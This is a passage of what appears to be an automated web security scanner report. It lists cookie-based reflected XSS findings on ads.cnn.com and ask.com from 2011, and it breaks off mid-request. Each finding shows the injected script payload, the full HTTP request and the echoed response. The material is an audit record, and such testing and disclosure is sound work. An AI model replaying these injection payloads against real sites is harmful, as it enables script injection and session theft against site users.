The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41e40"><script>alert(1)</script>a7702f5becb was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_position=315x40_spon3&cnn_money_rollup=business_news&cnn_money_section=sponsor_center&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=284939 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; s_cc=true; s_sq=%5B%5BB%5D%5D; NGUserID=aa55a22-30407-167278533-141e40"><script>alert(1)</script>a7702f5becb; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:45 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:45:45 GMT
Pragma: no-cache
Content-Length: 3735
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
85,686,917,1067,1285,1589,1678,1686,1735,3448,4443,37359,47128,47457,49568,49577,52263,52901,56058,56872,58702,61263,61887,61908,61913,63267,116729,116771&RawValues=NGUSERID%2Caa55a22-30407-167278533-141e40"><script>alert(1)</script>a7702f5becb%2CTIL%2C1313433990029&Redirect=http://clk.atdmt.com/UNY/go/312249416/direct/01/">
...[SNIP]...

1.105. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=315x40_spon4&cnn_money_rollup=business_news&cnn_money_section=sponsor_center&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=812248 [NGUserID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=315x40_spon4&cnn_money_rollup=business_news&cnn_money_section=sponsor_center&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=812248

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59818"><script>alert(1)</script>725de5fe4e2 was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_position=315x40_spon4&cnn_money_rollup=business_news&cnn_money_section=sponsor_center&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=812248 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; s_cc=true; s_sq=%5B%5BB%5D%5D; NGUserID=aa55a22-30407-167278533-159818"><script>alert(1)</script>725de5fe4e2; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:46:08 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:46:08 GMT
Pragma: no-cache
Content-Length: 989
Content-Type: text/html

<a target="_blank" href="/event.ng/Type=click&FlightID=4621&AdID=220606&TargetID=1515&Segments=1824,2244,2743,3285,6298,6520,6585,7043,7123,7130,7167,8598,10240,12260,17251,18961,19419,22175,25342,253
...[SNIP]...
,917,1067,1285,1589,1678,1686,1735,3448,4443,37359,47128,47457,49568,49578,52263,52901,56058,56872,57896,58702,61263,61887,61908,61913,63267,116729,116771&RawValues=NGUSERID%2Caa55a22-30407-167278533-159818"><script>alert(1)</script>725de5fe4e2%2CTIL%2C1313433990029&Redirect=http%3A%2F%2Fwww.cnn.com">
...[SNIP]...

1.106. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=315x40_spon5&cnn_money_rollup=business_news&cnn_money_section=sponsor_center&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=758067 [NGUserID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=315x40_spon5&cnn_money_rollup=business_news&cnn_money_section=sponsor_center&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=758067

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6df8b"><script>alert(1)</script>ef4040623f5 was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_position=315x40_spon5&cnn_money_rollup=business_news&cnn_money_section=sponsor_center&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=758067 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; s_cc=true; s_sq=%5B%5BB%5D%5D; NGUserID=aa55a22-30407-167278533-16df8b"><script>alert(1)</script>ef4040623f5; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:45 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:45:45 GMT
Pragma: no-cache
Content-Length: 4324
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
85,686,917,1067,1285,1589,1678,1686,1735,3448,4443,37359,47128,47457,49568,49579,52263,52901,56058,56872,58702,61263,61887,61908,61913,63267,116729,116771&RawValues=NGUSERID%2Caa55a22-30407-167278533-16df8b"><script>alert(1)</script>ef4040623f5%2CTIL%2C1313433990029&Redirect=http://ads.cnn.com/event.ng/Type=click&FlightID=402671&AdID=550263&TargetID=12855&Segments=1824,2244,2743,3285,6298,6520,6585,7043,7123,7130,7538,8598,10240,12260,17251,
...[SNIP]...

1.107. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=315x40_spon6&cnn_money_rollup=business_news&cnn_money_section=sponsor_center&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=401091 [NGUserID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=315x40_spon6&cnn_money_rollup=business_news&cnn_money_section=sponsor_center&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=401091

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 721f7"><script>alert(1)</script>cb37dfb6629 was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_position=315x40_spon6&cnn_money_rollup=business_news&cnn_money_section=sponsor_center&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=401091 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; s_cc=true; s_sq=%5B%5BB%5D%5D; NGUserID=aa55a22-30407-167278533-1721f7"><script>alert(1)</script>cb37dfb6629; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:46:08 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:46:08 GMT
Pragma: no-cache
Content-Length: 989
Content-Type: text/html

<a target="_blank" href="/event.ng/Type=click&FlightID=4621&AdID=220606&TargetID=1515&Segments=1824,2244,2743,3285,6298,6520,6585,7043,7123,7130,7756,8598,10240,12260,17251,18961,19419,22175,25342,253
...[SNIP]...
,917,1067,1285,1589,1678,1686,1735,3448,4443,37359,47128,47457,49568,49580,52263,52901,56058,56872,57896,58702,61263,61887,61908,61913,63267,116729,116771&RawValues=NGUSERID%2Caa55a22-30407-167278533-1721f7"><script>alert(1)</script>cb37dfb6629%2CTIL%2C1313433990029&Redirect=http%3A%2F%2Fwww.cnn.com">
...[SNIP]...

1.108. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=475x60_mid&cnn_money_rollup=markets_and_stocks&cnn_money_section=social_media&cnn_money_subsection=commenting&params.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434014105&page.allowcompete=yes&domId=113981 [NGUserID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=475x60_mid&cnn_money_rollup=markets_and_stocks&cnn_money_section=social_media&cnn_money_subsection=commenting&params.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434014105&page.allowcompete=yes&domId=113981

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f78e"><script>alert(1)</script>4fc306aade2 was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_position=475x60_mid&cnn_money_rollup=markets_and_stocks&cnn_money_section=social_media&cnn_money_subsection=commenting&params.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434014105&page.allowcompete=yes&domId=113981 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-16f78e"><script>alert(1)</script>4fc306aade2; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __unam=7549672-131cec47d99-1e28128-1; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=GOOG; WSOD%5FcompareToSP500=0; WSOD%5FcompareToCategory=0

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:46:55 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:46:55 GMT
Pragma: no-cache
Content-Length: 3626
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
,37359,47128,47457,52263,52901,56058,56872,57810,57896,58702,60072,60074,60077,60093,60443,61263,61421,61887,61908,61913,63267,116196,116269,116729,116771&RawValues=NGUSERID%2Caa55a22-30407-167278533-16f78e"><script>alert(1)</script>4fc306aade2%2CTIL%2C1313434014105&Redirect=http://www.money.com">
...[SNIP]...

1.109. http://www.ask.com/about/help [cu.wz cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /about/help

Issue detail

The value of the cu.wz cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95f9f"-alert(1)-"166177881c7 was submitted in the cu.wz cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/help HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/about/legal/ask-site-policies
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=095f9f"-alert(1)-"166177881c7; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.4.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=084EE34C926D4254193520127E77B26A; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjM2OjU0LVVUQw%3D%3D&po=0&pp=dir; qc=0

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
tr-request-id: TklnVQpcQKQAAAOoL3gAAADh
from-tr: trafrt012iad.io.askjeeves.info
Cache-Control: private
Content-Length: 48901
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:37:09 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: __qca=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjM3OjA5LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:37:09 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>

<head>
   <title>About Ask.com: Help Center</title>


<link href="http://
...[SNIP]...
{};
WZInfo.pickRedirectDefault = "http://wzus1.ask.com/r?t=p&d=us&s=a&c=h&app=a14&l=dir&o=0&sv=0a5c407e&ip=32177b6a&id=092B253AE6639F9442E96758F819E080&q=&p=0&qs=121&ac=24&g=6f992AY+nqUEm9&cu.wz=095f9f"-alert(1)-"166177881c7";
WZInfo.pickDefault = "http://wzus1.ask.com/i/b.html?t=p&d=us&s=a&c=h&app=a14&l=dir&o=0&sv=0a5c407e&ip=32177b6a&id=092B253AE6639F9442E96758F819E080&q=&p=0&qs=121&ac=24&g=6f992AY+nqUEm9&cu.wz=095
...[SNIP]...

1.110. http://www.ask.com/about/help/webmasters [cu.wz cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /about/help/webmasters

Issue detail

The value of the cu.wz cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 133a3"-alert(1)-"b0442117721 was submitted in the cu.wz cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/help/webmasters HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/about/help
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0133a3"-alert(1)-"b0442117721; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.4.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=084EE34C926D4254193520127E77B26A; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjM3OjAwLVVUQw%3D%3D&po=0&pp=dir; qc=0

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
tr-request-id: TklnYApcQW8AAHONnLMAAAED
from-tr: trafrt001iad.io.askjeeves.info
Content-Length: 48900
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:37:20 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: __qca=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjM3OjIwLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:37:20 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>

<head>
   <title>About Ask.com: Webmasters</title>


<link href="http://w
...[SNIP]...
{};
WZInfo.pickRedirectDefault = "http://wzus1.ask.com/r?t=p&d=us&s=a&c=h&app=a14&l=dir&o=0&sv=0a5c4071&ip=32177b6a&id=B02E64EAD53183EC52340B52FB48903D&q=&p=0&qs=121&ac=24&g=025csZepI60Lr7&cu.wz=0133a3"-alert(1)-"b0442117721";
WZInfo.pickDefault = "http://wzus1.ask.com/i/b.html?t=p&d=us&s=a&c=h&app=a14&l=dir&o=0&sv=0a5c4071&ip=32177b6a&id=B02E64EAD53183EC52340B52FB48903D&q=&p=0&qs=121&ac=24&g=025csZepI60Lr7&cu.wz=013
...[SNIP]...

1.111. http://www.ask.com/about/legal/ask-site-policies [cu.wz cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /about/legal/ask-site-policies

Issue detail

The value of the cu.wz cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34dea"-alert(1)-"8e07e4958b0 was submitted in the cu.wz cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/legal/ask-site-policies HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/about/legal/privacy
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=034dea"-alert(1)-"8e07e4958b0; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.4.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjMyLVVUQw%3D%3D&po=0&pp=dir; qc=0; wz_sid=084EE34C926D4254193520127E77B26A

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
tr-request-id: TklnVApcQDoAAAsB@9gAAAKs
from-tr: trafrt010iad.io.askjeeves.info
Content-Length: 49685
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:37:08 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: __qca=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjM3OjA4LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:37:08 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>

<head>
   <title>About Ask.com: Ask Site Policies</title>


<link href="h
...[SNIP]...
{};
WZInfo.pickRedirectDefault = "http://wzus1.ask.com/r?t=p&d=us&s=a&c=h&app=a14&l=dir&o=0&sv=0a5c4070&ip=32177b6a&id=D40C80CDE7C508A2C105A9CAE2332676&q=&p=0&qs=121&ac=24&g=193fGoyHOi6rbq&cu.wz=034dea"-alert(1)-"8e07e4958b0";
WZInfo.pickDefault = "http://wzus1.ask.com/i/b.html?t=p&d=us&s=a&c=h&app=a14&l=dir&o=0&sv=0a5c4070&ip=32177b6a&id=D40C80CDE7C508A2C105A9CAE2332676&q=&p=0&qs=121&ac=24&g=193fGoyHOi6rbq&cu.wz=034
...[SNIP]...

1.112. http://www.ask.com/about/legal/privacy [cu.wz cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /about/legal/privacy

Issue detail

The value of the cu.wz cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb1f2"-alert(1)-"7a4166739ea was submitted in the cu.wz cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/legal/privacy HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/news?o=0&l=dir&qsrc=168&q=xss
